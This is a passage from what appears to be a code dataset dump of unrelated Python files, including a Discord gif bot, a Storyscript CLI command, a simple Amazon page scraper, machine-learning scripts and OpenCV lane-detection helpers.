self.gif_table.get(Query().name == name)\n _gif[\"hidden\"] = False\n self.gif_table.update(_gif, Query().name == name)\n await ctx.send(\"Revealed gif: \" + name)\n\n @giffer.command()\n async def list(self, ctx):\n \"\"\"Display a list of gifs\"\"\"\n _gif_list = natsort.natsorted(self.gif_table.search(Query().hidden == False), key=lambda k: k[\"name\"])\n\n if len(_gif_list) <= 0:\n await ctx.send(\"No gifs found!\\nUse `{prefix}giffer add ` to add a gif\".format(\n prefix=self.bot.cfg[\"prefix\"]))\n else:\n g = [x[\"name\"] for x in _gif_list]\n\n await ctx.send(\"**\" + str(len(g)) +\n \"** ```\" + tabulate(self.make_tabulated_list(g), tablefmt=\"plain\") + \"```\")\n\n @giffer.command(name=\"hidden\")\n @Checks.restricted_cmd()\n async def list_hidden(self, ctx):\n \"\"\"Display a list of hidden gifs\"\"\"\n _gif_list = sorted(self.gif_table.search(Query()[\"hidden\"] == True), key=lambda k: k[\"name\"])\n if len(_gif_list) <= 0:\n await ctx.send(\"No hidden gifs found!\")\n else:\n g = [x[\"name\"] for x in _gif_list]\n\n await ctx.send(\"**\" + str(len(g)) +\n \"** ```\" + tabulate(self.make_tabulated_list(g), tablefmt=\"plain\") + \"```\")\n\n @giffer.command(name=\"rename\")\n @Checks.restricted_cmd()\n async def rename_gif(self, ctx, old_name, new_name):\n \"\"\"Rename a 
gif\"\"\"\n if not self.gif_table.contains(Query().name == old_name):\n await ctx.send(\"No gif exists with that name\")\n else:\n _gif = self.gif_table.get(Query().name == old_name)\n _gif[\"name\"] = new_name\n self.gif_table.update(_gif, Query().name == old_name)\n await ctx.send(\"Renamed gif: \" + old_name + \" to \" + new_name)\n\n @giffer.command()\n async def search(self, ctx, name):\n \"\"\"Search for a gif\"\"\"\n _gif_list = self.gif_table.search(Query().name.search(name))\n if len(_gif_list) <= 0:\n await ctx.send(\"No gifs found with search query: {}\".format(name))\n else:\n g = [x[\"name\"] for x in _gif_list if not x[\"hidden\"]]\n await ctx.send(\"**\" + str(len(g)) +\n \"** ```\" + tabulate(self.make_tabulated_list(g), tablefmt=\"plain\") + \"```\")\n\n def make_tabulated_list(self, gifs):\n cols = 6\n per_col = int(math.ceil(len(gifs) / cols))\n\n e = []\n g2 = [copy(e) for x in range(per_col)]\n\n for a in range(cols):\n for b in range(per_col):\n if len(gifs) == 0:\n break\n gif = gifs.pop(0)\n g2[b].append(gif)\n\n return g2\n\n\ndef setup(bot):\n bot.add_cog(Gifs(bot))\n","sub_path":"cogs/gifs.py","file_name":"gifs.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243335651","text":"import collections\n\nfrom django.shortcuts import Http404\nfrom django.utils import translation\n\nNotifySettings = collections.namedtuple(\n 'NotifySettings', [\n 'contact_company_template',\n 'contact_support_template',\n 'contact_investor_template',\n 'contact_support_email_address',\n ]\n)\n\n\ndef handle_cms_response(response):\n if response.status_code == 404:\n raise Http404()\n response.raise_for_status()\n return response.json()\n\n\ndef get_language_from_querystring(request):\n language_code = request.GET.get('language') or request.GET.get('lang')\n language_codes = translation.trans_real.get_languages()\n if language_code and language_code in language_codes:\n return language_code\n","sub_path":"core/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"13410697","text":"from keras.models import load_model\nimport pickle\nimport numpy as np\nimport os\n# Load in the model using absolute path\nmodel = load_model(os.path.abspath(\"model1.h5\"))\n# make the prediction function\nmodel._make_predict_function()\n\n# Load in feature selector using absolute path\nfeature_selector = pickle.load(open(os.path.abspath(\"feature_selector.pkl\"),\n 'rb'),encoding='latin1')\n\n# Load in Standard scaler using absolute path\nscaler = pickle.load(open(os.path.abspath(\"standard_scaler.pkl\"),\n \"rb\"),encoding='latin1')\n\nclass_names = ['teens','twenties','thirties','fourties','fifties','sixties',\n 'seventies','eighties']\n\n\ndef model_predict(input):\n \"\"\"Given input array of featurized audio, returns model prediction\n Args:\n -- input (numpy array) input to put in machine learning model\n Returns:\n -- prediction (str) age category based on featurized audio\n \"\"\"\n\n # make sure we get in a numpy matrix for the features\n assert isinstance(input,np.ndarray)\n # feature selection\n features = feature_selector.transform(input)\n\n # standard scale the data\n features = scaler.transform(features)\n\n # gets an array of the probability that the speaker belongs to a particular class\n prediction_probs = model.predict(features)\n\n # gets the index of the highest 
probability\n prediction_index = np.argmax(prediction_probs)\n\n # get the class label based on the index\n prediction = class_names[prediction_index]\n\n return prediction\n","sub_path":"webapp/server/ml_models/neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"307898441","text":"# -*- coding: utf-8 -*-\nimport pkgutil\n\nimport click\n\nimport emoji\n\nfrom story import cli\n\nCHOICES = [\n 'http',\n 'every',\n 'function',\n 'if',\n 'loop',\n 'twitter',\n 'slack-bot',\n 'subscribe',\n 'every',\n 'websocket',\n '-',\n]\n\n\n@cli.cli.command()\n@click.argument('story', default='-', type=click.Choice(CHOICES))\n@click.argument(\n 'output_file', default=None, type=click.Path(exists=False), required=False\n)\ndef write(story, output_file=None):\n \"\"\"Pre–defined Storyscripts for your app!\"\"\"\n\n # Support '$ story write http -` usecase.`\n if output_file == '-':\n output_file = None\n\n if story == '-':\n click.echo(click.style('Please specify a template:', bold=True))\n click.echo(\n click.style(' http', fg='cyan') + ' - serverless http')\n click.echo(\n click.style(' function', fg='cyan') + ' - generic function')\n click.echo(\n click.style(' if', fg='cyan') + ' - example if/then')\n click.echo(\n click.style(' loop', fg='cyan') + ' - example for loop')\n click.echo(click.style(' twitter', fg='cyan') + ' - stream Tweets')\n click.echo('')\n\n click.echo(\n click.style('Coming Soon',\n bold=True) + ' (under active development):'\n )\n click.echo(click.style(' slack-bot', fg='cyan') + ' - Slack bot')\n click.echo(\n click.style(' subscribe', fg='cyan') + ' - event subscriptions')\n click.echo(\n click.style(' every', fg='cyan') + ' - periodically run this')\n click.echo(\n click.style(' websocket', fg='cyan') + ' - websocket support')\n click.echo('')\n\n click.echo(\n ' Run $ '\n + click.style('story write :template_name: ', fg='magenta')\n + emoji.emojize(':backhand_index_pointing_left:')\n )\n click.echo('')\n\n click.echo(click.style('Learn more:', bold=True))\n click.echo(\n ' - Examples: '\n + click.style('https://github.com/topics/storyscript-example',\n fg='cyan')\n )\n click.echo(\n ' - Services: ' + click.style('https://hub.storyscript.io/',\n fg='cyan')\n )\n click.echo('')\n\n else:\n\n # Grab the story, from packaging...\n data = pkgutil.get_data('story', f'stories/{story}.story')\n\n # If output_file was passed, assume it was an interfactive session.\n if output_file:\n # Write to the file...\n with open(output_file, 'wb') as f:\n f.write(data)\n\n cmd = f'cat {output_file}'\n cmd = click.style(cmd, fg='magenta')\n click.echo(f'$ {cmd}', err=True)\n\n click.echo(data)\n\n app_name = cli.get_app_name_from_yml()\n if app_name is None:\n app_name = 'Not created yet'\n\n cli.track('App Bootstrapped',\n {'App name': app_name, 'Template used': story})\n","sub_path":"story/commands/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":3076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"446698259","text":"# https://www.youtube.com/watch?v=XQgXKtPSzUI\n#%%\nimport bs4\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup as soup\n\nmyurl = 'https://www.amazon.com/s/ref=nb_sb_noss?__mk_zh_CN=%E4%BA%9A%E9%A9%AC%E9%80%8A%E7%BD%91%E7%AB%99&url=search-alias%3Daps&field-keywords=%E6%98%BE%E5%8D%A1'\n\nclient = urlopen(myurl)\nhtml_text = 
client.read()\n\ntext_soup = soup(html_text, 'html.parser')\n\nclient.close()\n#%%\nmfile = open(\"test.html\", \"w\")\nprint(text_soup, file=mfile)\nmfile.close()\n\n#%%\ncontainers = text_soup.findAll(\"div\",{\"class\":\"a-section a-spacing-medium\"})\n\nlen(containers)","sub_path":"Python/web crawler/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"34694679","text":"from __future__ import division\nimport numpy as np\nfrom sklearn import (metrics, cross_validation, linear_model, preprocessing)\nfrom sklearn.ensemble import RandomForestClassifier\n\nSEED = 30\n\n\ndef load_data(filename, use_labels=True):\n\n    data = np.loadtxt(open(filename), delimiter=',' , usecols=range(1, 9), skiprows=1)\n    if use_labels:\n        labels = np.loadtxt(open(filename), delimiter=',' , usecols=[0], skiprows=1)\n    else:\n        labels = np.zeros(data.shape[0])\n    return labels, data\n\n\ndef save_results(predictions, filename):\n\n    with open(filename, 'w') as f:\n        f.write(\"id,ACTION\\n\")\n        for i, pred in enumerate(predictions):\n            f.write(\"%d,%f\\n\" % (i + 1, pred))\n\n\ndef main():\n\n    model = RandomForestClassifier(random_state=0) # the classifier we'll use; a classifier (not a regressor) is required for predict_proba below\n\n# === load data in memory === #\n    y, X = load_data('train.csv')\n    y_test, X_test = load_data('test.csv', use_labels=False)\n\n    encoder = preprocessing.OneHotEncoder()\n    encoder.fit(np.vstack((X, X_test)))\n    X = encoder.transform(X)  # Returns a sparse matrix (see numpy.sparse)\n    X_test = encoder.transform(X_test)\n\n# === training & metrics === #\n    mean_auc = 0.0\n    n = 10  # repeat the CV procedure 10 times to get more precise results\n    for i in range(n):\n        # for each iteration, randomly hold out 20% of the data as CV set\n        X_train, X_cv, y_train, y_cv = cross_validation.train_test_split(\n            X, y, test_size=.40, random_state=i*SEED)\n\n\n        # train model and make predictions\n        model.fit(X_train, y_train)\n        preds = model.predict_proba(X_cv)[:, 1]\n\n        # compute AUC metric for this CV fold\n        fpr, tpr, thresholds = metrics.roc_curve(y_cv, preds)\n        roc_auc = metrics.auc(fpr, tpr)\n        print (\"AUC (fold %d/%d): %f\" % (i + 1, n, roc_auc))\n        mean_auc += roc_auc\n\n    print (\"Mean AUC: %f\" % (mean_auc/n))\n    model.fit(X, y)  # refit on the full training set before predicting on the test set\n    preds = model.predict_proba(X_test)[:, 1]\n    save_results(preds, \"output1\" + \".csv\")\n\nif __name__ == '__main__':\n    main()\n","sub_path":"Amazon/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"123530672","text":"\n\n''' \n    prepare the log data for the input of an LSTM deep network\n    \n    We have this information:\n    157610555\t16\t2017-10-27T09:12:30.0179Z\thttps://sigeventos.ufrn.br/eventos/menu.xhtml 6\t FALSE\n\n    And we want to format it like this\n\n    0,000122 0,0333\t0,02030234234234 0,00032423404234234234324323 0,3\n\n    for the input of the network\n    \n    @author jadsonjs@gmail.com\n'''\n\n\nfrom csv_module import load_csv_data\nfrom csv_module import save_csv_data\nfrom hash_module import textual_hash\nfrom hash_module import date_milliseconds\nfrom normalization_module import normalize_feature\nfrom array_module import reshape_input\n\n\n\n\ndef prepareLSTMdata(raw_data_file_name, deep_network_file_name, features_indexes):\n\n\tqtd_features = len(features_indexes)\n\n\t# load just the features located at these positions in the csv file\n\tcvs_raw_data = 
load_csv_data(raw_data_file_name, features_indexes)\n\n\tprint('### 1 ###')\n\tprint(cvs_raw_data)\n\n\t# converte the url to numeric value\n\tcvs_numeric_data = textual_hash(cvs_raw_data, 3, qtd_features)\n\t\n\t# converte the date to numeric value\n\tcvs_numeric_data = date_milliseconds(cvs_numeric_data, 2, qtd_features)\n \n\tprint('### 2 ###')\n\tprint(cvs_numeric_data)\n\n\tcvs_normalized_data = []\n \n\tfor feature in range( len(cvs_numeric_data) ):\n\t\tcvs_normalized_data = normalize_feature(cvs_numeric_data, feature, qtd_features)\n\n\tprint('### 3 ###')\n\tprint(cvs_normalized_data)\n\t\n\n\tsave_csv_data(deep_network_file_name, cvs_normalized_data, qtd_features)\n\n\n\n\n\n\n","sub_path":"DeepLearning/temp/prepare_input_module.py","file_name":"prepare_input_module.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"514170090","text":"# -*- coding: utf-8 -*-\nimport random\n# This is Testaction 3\n\ndef main(args):\n square = args.get(\"number\")\n randStr = \"\"\n for x in range(square):\n randStr += chr(random.randint(32,125))\n print(randStr)\n return {\"string\":randStr}\n\n#if __name__==\"__main__\":\n# main({\"square\":16})","sub_path":"func3.py","file_name":"func3.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"439302241","text":"class Relogio:\r\n def __init__(self):\r\n self.inicio = \"\"\r\n self.termino = \"\"\r\n self.running = True\r\n\r\n def get_inputs(self, inpX, inpNome):\r\n inpX = input(\"{}: \".format(inpNome))\r\n return inpX\r\n\r\n def splice_inp(self, inpX):\r\n inpX = inpX.lower()\r\n inpX = inpX.replace(\" horas e \", \",\")\r\n inpX = inpX.replace(\" minutos\", \",\")\r\n inpX = inpX.split(\",\")\r\n\r\n if len(inpX) > 2:\r\n inpX.pop()\r\n for i in range(2):\r\n inpX[i] = int(inpX[i])\r\n return inpX\r\n\r\n def check_inp(self, inpX):\r\n if 0 < inpX[0] <= 23 and 0 <= inpX[1] <= 60:\r\n return True\r\n else:\r\n print(\"Horas ou minutos invalidos\")\r\n return False\r\n\r\n def check_horarios(self):\r\n if self.inicio[0] > self.termino[0]:\r\n print(\"Horário Inválido\\n\")\r\n else:\r\n if self.inicio[0] >= self.termino[0] and self.inicio[1] > self.termino[1]:\r\n print(\"Horário Inválido\\n\")\r\n\r\n def math_horario(self, horaX, horaY):\r\n horaX = (horaX[0] * 60) + horaX[1]\r\n horaY = (horaY[0] * 60) + horaY[1]\r\n self.running = False\r\n return horaY - horaX\r\n\r\n def run(self):\r\n while self.running:\r\n\r\n while True:\r\n self.inicio = self.get_inputs(self.inicio, \"Inicio\")\r\n self.inicio = self.splice_inp(self.inicio)\r\n if self.check_inp(self.inicio):\r\n break\r\n else:\r\n pass\r\n while True:\r\n self.termino = self.get_inputs(self.termino, \"Termino\")\r\n self.termino = self.splice_inp(self.termino)\r\n if self.check_inp(self.termino):\r\n break\r\n else:\r\n pass\r\n\r\n self.check_horarios()\r\n print(\"Duração: {} minutos de duração\".format(self.math_horario(self.inicio, self.termino)))\r\n\r\n\r\nif __name__ == '__main__':\r\n r = Relogio()\r\n r.run()\r\n\r\n'''\r\nExercicio 5:\r\n\r\nConstrua um algoritmo que receba através do input do\r\nteclado a hora e minuto de início de um jogo e a hora e\r\nminuto do final do jogo. 
Calcule a duração do jogo em\r\nminutos, sabendo-se que o tempo máximo de duração do\r\njogo é de 24 horas e que o jogo deve iniciar e finalizar no\r\nmesmo dia.\r\n'''","sub_path":"Desafio Polyweek/Exercicio 5.py","file_name":"Exercicio 5.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"393020560","text":"import __builtin__\nfrom models import BaseModel\nfrom tools import *\nfrom tools import _2_circles_tangential_equations, _2_circles_tangential_equations_constrained\nfrom operator import itemgetter\nimport numpy as np\nimport solver\n\n\nclass TR170(BaseModel):\n def __init__(self, params=None, context=None):\n super(TR170, self).__init__(params, context)\n\n self.context = context\n self.params = params\n c = context\n p = params\n\n c['tc_R'] = p.R61\n c['tc_CX'] = p.W / 2.\n c['tc_CY'] = p.RI + p.H - p.R61\n\n c['ltc_R'] = p.R41\n c['ltc_CX'] = p.R41\n c['ltc_CY'] = p.RI + p.R40\n\n c['lbc_R'] = p.P3\n c['lbc_CX'] = p.P3\n c['lbc_CY'] = p.RI + p.R40 - p.P2\n\n c['rtc_R'] = p.R41\n c['rtc_CX'] = p.W - p.R41\n c['rtc_CY'] = p.RI + p.R40\n\n c['rbc_R'] = p.R40\n c['rbc_CX'] = p.W - p.R40\n c['rbc_CY'] = p.RI + p.R40\n\n def calculate_intersections(self):\n super(TR170, self).calculate_intersections()\n\n c = self.context\n p = self.params\n\n c.variables = []\n c.equations = []\n\n solutions = solver.calc_intersection('ltc', 'tc', c)\n self.sub_result = (\n sorted(solutions, key=itemgetter(2), reverse=True)[1]\n )\n\n x = float(self.sub_result[0])\n y = float(self.sub_result[1])\n cy = float(self.sub_result[2])\n\n c['p1_X'] = x\n c['p1_Y'] = y\n\n c['p2_Y'] = y\n c['p2_X'] = p.W - x\n\n c['p3_X'] = p.P3\n #c['p3_Y'] = p.RI + p.R40 - p.P3\n c['p3_Y'] = c['lbc_CY'] - p.P3\n\n c['p4_X'] = p.W - p.R40 - p.P1\n c['p4_Y'] = p.RI\n\n c['p5_X'] = p.W - p.R40\n c['p5_Y'] = p.RI\n\n\n def get_volume(self):\n c = self.context\n p = self.params\n\n atop1, th1 = volume_integrate_arc_top(\n P(c['ltc_CX'], c['ltc_CY']),\n c['ltc_R'],\n 0., c['p1_X']\n )\n\n atop2, th2 = volume_integrate_arc_top(\n P(c['tc_CX'], c['tc_CY']),\n c['tc_R'],\n c['p1_X'], c['p2_X']\n )\n\n atop3, th3 = volume_integrate_arc_top(\n P(c['rtc_CX'], c['rtc_CY']),\n c['rtc_R'],\n c['p2_X'], p.W\n )\n\n top = sum([atop1, atop2, atop3])\n\n abottom1, bh1 = volume_integrate_arc_bottom(\n P(c['lbc_CX'], c['lbc_CY']),\n c['lbc_R'],\n 0., c['p3_X']\n )\n\n abottom2, bh2 = volume_integrate_slope_bottom(\n c['p3_X'], c['p3_Y'],\n c['p4_X'], c['p4_Y'],\n c['p3_X'], c['p4_X']\n )\n\n abottom3, bh3 = volume_integrate_slope_bottom(\n c['p4_X'], c['p4_Y'],\n c['p5_X'], c['p5_Y'],\n c['p4_X'], c['p5_X']\n )\n\n abottom4, bh4 = volume_integrate_arc_bottom(\n P(c['rbc_CX'], c['rbc_CY']),\n c['rbc_R'],\n c['p5_X'], p.W\n )\n\n bottom = sum([abottom1, abottom2, abottom3, abottom4])\n\n volume = top - bottom\n min_height = min_drop_nones(th1, th2, th3) - max_drop_nones(bh1, bh2,\n bh3, bh4)\n\n return (\n float(volume / 1000.),\n min_height\n )","sub_path":"models/mTR170.py","file_name":"mTR170.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"522030638","text":"import scrape.pfr\nimport scrape.guru\nimport scrape.wiki\n\n\ndef scrape_player(guru_link, season_week_pairs, name=None):\n guru_data = guru.scrape_player(guru_link, name)\n\n def get_pfr_link():\n link = pfr.get_player_link(guru_data['first'], guru_data['last'], list(season_week_pairs))\n\n 
if not link:\n link = pfr.prepend_link(pfr.errors['player_links'].get(guru_link))\n\n return link\n\n pfr_link = get_pfr_link()\n\n def get_pfr_data():\n return pfr.scrape_player(pfr_link, season_week_pairs) if pfr_link else {'url': pfr_link,\n 'errors': {'pfr_link'}}\n\n pfr_data = get_pfr_data()\n\n def combine_scraped_data():\n scraped_data = {\n 'links': [guru_data['url'], pfr_link],\n 'first': guru_data['first'],\n 'last': guru_data['last'],\n 'position': guru_data['position'],\n 'team': pfr_data.get('team'),\n 'birthday': pfr_data.get('birthday'),\n 'games': pfr_data.get('games'),\n }\n\n def check_data_errors():\n full_name = '%s %s' % (scraped_data['first'], scraped_data['last'])\n\n def update_from_errors(errors):\n scraped_data.update(errors['data'].get(full_name, {}))\n\n update_from_errors(pfr.errors)\n\n check_data_errors()\n\n def check_errors():\n def combine_errors():\n all_errors = guru_data['errors']\n all_errors.update(pfr_data['errors'])\n return all_errors\n\n errors = combine_errors()\n\n if errors:\n wiki_links = wiki.get_player_links(scraped_data['first'], scraped_data['last'], scraped_data['position'])\n for link in wiki_links:\n wiki_data = wiki.scrape_player(link)\n\n if wiki_data['birthday'] == scraped_data['birthday']:\n def update_scraped_data():\n for error in errors.copy():\n if wiki_data.get(error):\n scraped_data.update({error: wiki_data[error]})\n errors.remove(error)\n\n update_scraped_data()\n break\n\n scraped_data.update({'errors': list(errors)})\n\n check_errors()\n return scraped_data\n\n return combine_scraped_data()\n\n\ndef scrape_game(pfr_link):\n pfr_game = pfr.scrape_game(pfr_link)\n pfr_game['errors'] = list(pfr_game['errors'])\n\n return pfr_game\n\n\ndef scrape_stadium(pfr_link):\n pfr_data = pfr.scrape_stadium(pfr_link)\n\n links = {pfr_data['url']}\n errors = pfr_data['errors'].copy()\n\n def get_wiki_link():\n def get_most_recent_name():\n name = pfr_data['names'][-1]['name']\n\n try:\n name = wiki.errors['stadium_names'][name]\n except KeyError:\n pass\n\n return name\n\n error_link = wiki.errors['stadium_links'].get(pfr_link)\n return error_link if error_link else wiki.get_stadium_link(get_most_recent_name())\n\n wiki_link = get_wiki_link()\n wiki_data = {}\n\n if wiki_link:\n wiki_data = wiki.scrape_stadium(wiki_link)\n links.add(wiki_data['url'])\n errors.update(wiki_data['errors'])\n else:\n errors.add('wiki_link')\n\n def check_errors():\n def check_teams():\n if 'teams' in errors:\n try:\n wiki_data.update({'teams': wiki.errors['stadium_teams'][pfr_link]})\n errors.remove('teams')\n except KeyError:\n pass\n\n if errors:\n check_teams()\n\n check_errors()\n\n return {'links': list(links),\n 'names': pfr_data.get('names'),\n 'surfaces': pfr_data.get('surfaces'),\n 'teams': wiki_data.get('teams'),\n 'errors': list(errors)}\n","sub_path":"backend/scrape/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"94146756","text":"import os\n\nfrom py2store.stores.sql_w_sqlalchemy import SQLAlchemyTupleStore\nfrom tests.base_test import BaseStoreTest\n\nSQLITE_DB_PATH = 'test.db'\nSQLITE_DB_URI = f'sqlite:///{SQLITE_DB_PATH}'\nSQLITE_TABLE_NAME = 'test_table'\n\n\ndef clean_db_path(path=SQLITE_DB_PATH):\n try:\n os.remove(path)\n except FileNotFoundError:\n pass\n\n\nclass TestSQLAlchemyTupleStore(BaseStoreTest):\n key_dict = {\n 'first_name': 'Yuri',\n 'last_name': 'Gagarin',\n }\n key = 
tuple(key_dict.values())\n\n data_dict = {\n 'height': '185sm',\n 'weight': '80kg',\n 'is_hero': 'yes he is',\n }\n data = tuple(data_dict.values())\n\n joined_values = {**key_dict, **data_dict}\n\n @classmethod\n def teardown_class(cls):\n clean_db_path()\n\n def test_crud(self):\n store = SQLAlchemyTupleStore(\n db_uri=SQLITE_DB_URI,\n collection_name=SQLITE_TABLE_NAME,\n key_fields=list(self.key_dict.keys()),\n data_fields=list(self.data_dict.keys()),\n )\n\n self._test_create(store)\n self._test_read(store)\n self._test_update(store)\n self._test_delete(store)\n","sub_path":"tests/test_sql_w_sqlalchemy.py","file_name":"test_sql_w_sqlalchemy.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"187305652","text":"import os\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\nimport cv2\nimport math\nimport collections\nfrom sklearn import linear_model\n\ndef grayscale(img):\n \"\"\"Applies the Grayscale transform\n This will return an image with only one color channel\n but NOTE: to see the returned image as grayscale\n (assuming your grayscaled image is called 'gray')\n you should call plt.imshow(gray, cmap='gray')\"\"\"\n return cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)\n\ndef canny(img, low_threshold, high_threshold):\n \"\"\"Applies the Canny transform\"\"\"\n return cv2.Canny(img, low_threshold, high_threshold)\n\ndef gaussian_blur(img, kernel_size):\n \"\"\"Applies a Gaussian Noise kernel\"\"\"\n return cv2.GaussianBlur(img, (kernel_size, kernel_size), 0)\n\ndef region_of_interest(img, vertices):\n \"\"\"\n Applies an image mask.\n\n Only keeps the region of the image defined by the polygon\n formed from `vertices`. The rest of the image is set to black.\n \"\"\"\n #defining a blank mask to start with\n mask = np.zeros_like(img)\n\n #defining a 3 channel or 1 channel color to fill the mask with depending on the input image\n if len(img.shape) > 2:\n channel_count = img.shape[2] # i.e. 3 or 4 depending on your image\n ignore_mask_color = (255,) * channel_count\n else:\n ignore_mask_color = 255\n\n #filling pixels inside the polygon defined by \"vertices\" with the fill color\n cv2.fillPoly(mask, vertices, ignore_mask_color)\n\n #returning the image only where mask pixels are nonzero\n masked_image = cv2.bitwise_and(img, mask)\n return masked_image\n\nprevious_frames = collections.deque(maxlen=10)\n\ndef draw_lines(img, lines, color=[255, 0, 0], thickness=5):\n \"\"\"\n NOTE: this is the function you might want to use as a starting point once you want to\n average/extrapolate the line segments you detect to map out the full\n extent of the lane (going from the result shown in raw-lines-example.mp4\n to that shown in P1_example.mp4).\n\n Think about things like separating line segments by their\n slope ((y2-y1)/(x2-x1)) to decide which segments are part of the left\n line vs. the right line. 
Then, you can average the position of each of\n the lines and extrapolate to the top and bottom of the lane.\n\n This function draws `lines` with `color` and `thickness`.\n Lines are drawn on the image inplace (mutates the image).\n If you want to make the lines semi-transparent, think about combining\n this function with the weighted_img() function below\n \"\"\"\n\n m_tresh_horiz = 0.5\n m_tresh_vert = 0.8\n\n m_left = []\n x1_left = []\n x2_left = []\n y1_left = []\n y2_left = []\n\n m_right = []\n x1_right = []\n x2_right = []\n y1_right = []\n y2_right = []\n\n y_max = img.shape[0]\n y_min = int(img.shape[0]*0.59)\n\n XLeft = []\n yLeft = []\n XRight = []\n yRight = []\n\n for line in lines:\n for x1,y1,x2,y2 in line:\n m=(y2-y1)/(x2-x1)\n # remove random horizontal or vertical lines\n if m_tresh_horiz < abs(m) < m_tresh_vert:\n # left line\n if m < 0:\n m_left.append(m)\n x1_left.append(x1)\n x2_left.append(x2)\n y1_left.append(y1)\n y2_left.append(y2)\n XLeft.append(x1)\n XLeft.append(x2)\n yLeft.append(y1)\n yLeft.append(y2)\n # right line\n elif m > 0:\n m_right.append(m)\n x1_right.append(x1)\n x2_right.append(x2)\n y1_right.append(y1)\n y2_right.append(y2)\n XRight.append(x1)\n XRight.append(x2)\n yRight.append(y1)\n yRight.append(y2)\n\n # left\n m_left_median = np.median(m_left)\n x1_left_median = np.median(x1_left)\n x2_left_median = np.median(x2_left)\n y1_left_median = np.median(y1_left)\n y2_left_median = np.median(y2_left)\n\n b_left = y1_left_median - m_left_median * x1_left_median\n\n # right\n m_right_median = np.median(m_right)\n x1_right_median = np.median(x1_right)\n x2_right_median = np.median(x2_right)\n y1_right_median = np.median(y1_right)\n y2_right_median = np.median(y2_right)\n\n #ransac = linear_model.RANSACRegressor()\n #XLeft = np.array(XLeft)\n #yLeft = np.array(yLeft)\n #ransac.fit(XLeft, yLeft)\n\n b_right= y1_right_median - m_right_median * x1_right_median\n\n # Average lines using last 10 frames\n previous_frames.append((m_left_median, b_left, m_right_median, b_right))\n if len(previous_frames) > 0:\n median = np.median(previous_frames, -2)\n m_left = median[0]\n b_left = median[1]\n m_right = median[2]\n b_right = median[3]\n\n x1_left = int((y_max - b_left) / m_left)\n x2_left = int((y_min - b_left) / m_left)\n x1_right = int((y_max - b_right) / m_right)\n x2_right = int((y_min - b_right) / m_right)\n\n # Draw left and right line\n cv2.line(img, (x1_left, y_max), (x2_left, y_min), color, thickness)\n cv2.line(img, (x1_right, y_max), (x2_right, y_min), color, thickness)\n\n #for line in lines:\n # for x1,y1,x2,y2 in line:\n # m=(y2-y1)/(x2-x1)\n # if m_tresh_horiz < abs(m) < m_tresh_vert:\n # cv2.line(img, (x1, y1), (x2, y2), color, thickness)\n\n #imshape = img.shape\n #vertices = np.array([[(int(imshape[1]*0.1), imshape[0]),\n # (int(imshape[1]*0.425), int(imshape[0]*0.61)),\n # (int(imshape[1]*0.595), int(imshape[0]*0.61)),\n # (int(imshape[1]*0.97),imshape[0]),\n # (int(imshape[1]*0.82), imshape[0]),\n # (int(imshape[1]*0.6), int(imshape[0]*0.75)),\n # (int(imshape[1]*0.45), int(imshape[0]*0.75)),\n # (int(imshape[1]*0.25), imshape[0])]],\n # dtype=np.int32)\n #cv2.fillPoly(img, vertices, [0,0,255])\n\ndef hough_lines(img, rho, theta, threshold, min_line_len, max_line_gap):\n \"\"\"\n `img` should be the output of a Canny transform.\n\n Returns an image with hough lines drawn.\n \"\"\"\n lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)\n line_img = np.zeros((img.shape[0], 
img.shape[1], 3), dtype=np.uint8)\n draw_lines(line_img, lines)\n return line_img\n\n# Python 3 has support for cool math symbols.\ndef weighted_img(img, initial_img, α=0.8, β=1., λ=0.):\n \"\"\"\n `img` is the output of the hough_lines(), An image with lines drawn on it.\n Should be a blank image (all black) with lines drawn on it.\n\n `initial_img` should be the image before any processing.\n\n The result image is computed as follows:\n\n initial_img * α + img * β + λ\n NOTE: initial_img and img must be the same shape!\n \"\"\"\n return cv2.addWeighted(initial_img, α, img, β, λ)\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":7106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"443757489","text":"\"\"\"\nA mechanism to ingest CSV files into a database.\n\nIn morphological profiling experiments, a CellProfiler pipeline is often run in parallel across multiple images and\nproduces a set of CSV files. For example, imaging a 384-well plate, with 9 sites per well, produces 384 * 9 images;\na CellProfiler process may be run on each image, resulting in a 384*9 output directories (each directory typically\ncontains one CSV file per compartment (e.g. Cells.csv, Cytoplasm.csv, Nuclei.csv) and one CSV file for per-image\nmeasurements (e.g. Image.csv).\n\n``cytominer_database.ingest.seed`` can be used to read 